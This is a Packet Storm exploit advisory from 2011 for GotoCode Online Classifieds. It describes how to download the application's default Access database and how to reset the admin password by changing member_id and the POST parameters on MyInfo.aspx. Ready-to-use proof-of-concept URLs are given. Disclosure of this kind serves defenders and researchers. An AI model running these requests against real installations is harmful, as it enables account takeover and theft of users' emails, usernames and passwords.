what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GotoCode Online Classifieds Access Bypass

GotoCode Online Classifieds Access Bypass
Posted Oct 9, 2011
Authored by Nathaniel Carew

GotoCode Online Classifieds suffers from a remote access bypass vulnerability.

tags | exploit, remote, bypass
SHA-256 | 243bd48b5af4b6b4e43da2b27148c44755c0741285772bffe1ce89f21e6f334e

GotoCode Online Classifieds Access Bypass

Change Mirror Download
###############################################################################
# Exploit Title : GotoCode Online Classifieds Multiple Vulnerabilities
# Vulnerability : Privilege Escalation / Remote Database Download
# Date : 09/10/2011
# Author : Nathaniel Carew
# Email : njcarew@gmail.com
# Impact : High
# Software Link : http://www.gotocode.com/apps.asp?app_id=5&
# Platform : ASP.NET
# Tested on : MS Windows Server Standard 2003 SP2 / IIS 6
# Thanks : Peregrinus & Birch Meister General
###############################################################################

Overview:
---------
Database:
If the application is configured using the default directory structure and an
access database then a user can download the access database.

Privilege Escalation:
First reset your own password via the 'Registration' link:
http://localhost/[path]/Registration.aspx
This now takes you to a new page where you can select the 'Edit my info' link:
http://localhost/[path]/MyInfo.aspx?member_id=10&
Change the above GET URI to member_id=1& and refresh

Now by modifying the following variables in the POST data you can reset the admin password
with the password you entered into the appropriate field to gain full admin rights to the web application:

p_Record_member_id=1
Record_member_id=1
Record_name=admin
Record_member_password=newpass

Proof of Concept:
-----------------
http://localhost/[path]/Classifieds_MSAccess.mdb
http://localhost/[path]/MyInfo.aspx?p_Record_member_id=1&Record_member_id=1&Record_name=admin&Record_member_password=newpass&Record_email=moo&Record_location=&Record_home_phone=&Record_work_phone=

Impact:
-------
By resetting the admin password an attacker would be able to completely control the application, users
and their associated data. Successful database exploitation would allow an attacker to download the complete
database of users information including email addresses usernames, passwords and associated classified listed data.

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close